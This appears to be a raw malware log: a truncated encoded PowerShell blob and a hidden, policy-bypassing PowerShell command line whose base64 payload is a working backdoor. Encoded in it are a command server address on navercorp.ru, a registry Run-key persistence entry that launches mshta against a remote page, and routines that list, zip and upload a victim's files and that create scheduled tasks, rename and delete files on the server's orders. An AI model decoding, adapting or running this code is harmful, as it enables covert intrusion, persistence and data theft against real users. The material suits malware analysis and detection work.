EAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAdABhAHMAawA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA1ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewAkAEEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AOwAkAFMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAoAEcAZQB0AC0ARABhAHQAZQApACAALQBSAGUAcABlAHQAaQB0AGkAbwBuAEkAbgB0AGUAcgB2AGEAbAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAAMQAwACkAOwAkAFQAYQBzAGsAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAUwBlAHQAdABpAG4AZwBzADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVABhAHMAawBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABUAGEAcwBrADsAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAWABhAE4AcwBZAEoAYgBYAGoAVABuACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwB6AGkAcAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQATQBlAGoAWABDAD0AJABjAGkAZQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABNAGUAagBYAEMALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAZQBsADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAGUAagBYAEMAOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA=
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4ADsAJABWAHMAVgBtAGEARABqACAAPQAgADEAMAAyADQAIAAqACAAMQAwADIANAA7ACQAeAB3AGIAcAB5AG0AZABVAFcATgBzACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJABIAFoAZwBxAGYAQgBLAFgAIAA9ACAAJwBoAHQAdABwADoALwAvAG4AYQB2AGUAcgBjAG8AcgBwAC4AcgB1AC8AZABhAHMAaABiAG8AYQByAGQALwBpAG0AYQBnAGUALwAyADAAMgAzADAAMgAvAGMAbwBtAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJAB4AHcAYgBwAHkAbQBkAFUAVwBOAHMAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAagBYAFMAaABBAGUAZwBNAEUAVwBNAHcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABmAEcAWgB0AE0AIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAAMwA5ADEANwA2ADMAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwBuAGEAdgBlAHIAYwBvAHIAcAAuAHIAdQAvAGQAYQBzAGgAYgBvAGEAcgBkAC8AaQBtAGEAZwBlAC8AMgAwADIAMwAwADIALwA0AC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAoACQAQwB6AHIASAAsACAAJABqAGQAVwBWACkAewAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBkAFcAVgApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBhAHAAcABsAGkAYwBhAHQAaQBvAG4ALwB4AC0AdwB3AHcALQBmAG8AcgBtAC0AdQByAGwAZQBuAGMAbwBkAGUAZAAnADsAJABWAGYAdABZAFoASAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABJAEoAYgBOAGcAcABSAGcAVQBMAEUAVABEAC4ATABlAG4AZwB0AGgAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQALAAgADAALAAgACQASQBKAGIATgBnAHAAUgBnAFUATABFAFQARAAuAEwAZQBuAGcAdABoACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4ARgBsAHUAcwBoACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBDAGwAbwBzAGUAKAApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAgACQAUgBLAGMAbAAgAD0AIAAkAFYAZgB0AFkAWgBIAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQARAB5AGMARAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAUgBLAGMAbAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUATABUACAAPQAgACQARAB5AGMARAAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEQAagBVAHUAaQAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACwAIAAkAHQAdQBwACwAIAAkAGIAQgBxAGwAVgApAHsAJABUAGkAbQBlAG8AdQB0AD0AMQAwADAAMAAwADAAMAAwADsAJABDAFIATABGACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAARAApACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAAQQApADsAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAPQAgACcALQAtACcAOwAkAEIAbwB1AG4AZABhAHIAeQAgAD0AIAAnACoAKgAqACoAKgAnADsAJABzAHQAcgBlAGEAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBPAHAAZQBuAFIAZQBhAGQAKAAkAHYAUABFAGEAdgBSAE8AagB2AG4AKQA7ACQATAByAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABWAHMAVgBtAGEARABqADsAdwBoAGkAbABlACgAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABMAHIAQgAsADAALAAkAFYAcwBWAG0AYQBEAGoAKQApAHsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBUAGkAbQBlAG8AdQB0ACAAPQAgACQAVABpAG0AZQBvAHUAdAA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUAIAA9ACAAJABWAGYAdABZAFoASAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQAdAB1AHAAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABiAEIAcQBsAFYAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAFcAcgBpAHQAZQAoACQATAByAEIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADQALAAgADAALAAgACQAaABlAGEAZABpAG4AZwA0AC4ATABlAG4AZwB0AGgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBGAGwAdQBzAGgAKAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJABSAEsAYwBsACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABEAHkAYwBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABSAEsAYwBsAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAIAA9ACAAJABEAHkAYwBEAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAARABNAEUASABzAFEASwBWAFUAaAAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAUgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHoAcgBIACkAOwAkAFIAZQBxAHUAZQBzAHQALgBzAGUAdABfAFQAaQBtAGUAbwB1AHQAKAAxADUAMAAwADAAKQA7ACQAUgBlAHMAcABvAG4AcwBlACAAPQAgACQAUgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAFMAcABsAGkAdABTAGkAegBlACAAPQAgADEAMAAyADQAOwAkAEIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAEIAeQB0AGUAWwBdACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAOwBUAHIAeQAgAHsARABvACAAewAkAEMAbwB1AG4AdAAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAFMAcABsAGkAdABTAGkAegBlACkAOwAkAG8AZgBmAHMAZQB0ACAAPQAgACQAQwBvAHUAbgB0ACAALQAgADEAOwBBAGQAZAAtAEMAbwBuAHQAZQBuAHQAIAAkAHYAUABFAGEAdgBSAE8AagB2AG4AIAAkAEIAdQBmAGYAZQByAFsAMAAuAC4AJABvAGYAZgBzAGUAdABdACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAfQAgAFUAbgB0AGkAbAAoACQAQwBvAHUAbgB0ACAALQBlAHEAIAAwACkAfQAgAEMAYQB0AGMAaAAgAHsAfQAgAEYAaQBuAGEAbABsAHkAIAB7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwB9AH0AZABvAHsAVAByAHkAewAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAAPQAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJwAnADsASQBmACAAKAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnACcAKQB7ACQAZQBWAGoAVgBPAEcASQBLAE0ARABVAEMAPQAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4ATABlAG4AZwB0AGgAIAAtACAAMgApADsAJABjAGkAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAFYAagBWAE8ARwBJAEsATQBEAFUAQwApACkAOwBpAGYAIAAoACQAYwBpAGUAKQB7AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZgBpAGwAZQBpAG4AZgBvADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADkAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAGMAcwB2ACcAOwBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAGUAagBYAEMAIAAtAEYAaQBsAHQAZQByACAAKgAuACoAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAE4AYQBtAGUALAAgAEwAZQBuAGcAdABoACwAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACwAIABGAHUAbABsAG4AYQBtAGUAIAB8ACAARQB4AHAAbwByAHQALQBDAHMAdgAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACAALQBGAG8AcgBjAGUAIAAtAE4AbwBUAHkAcABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAdQB0AGYAOAA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAaQBuAGYAbwAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAHoAaQBwACcAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAAJABNAGUAagBYAEMAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC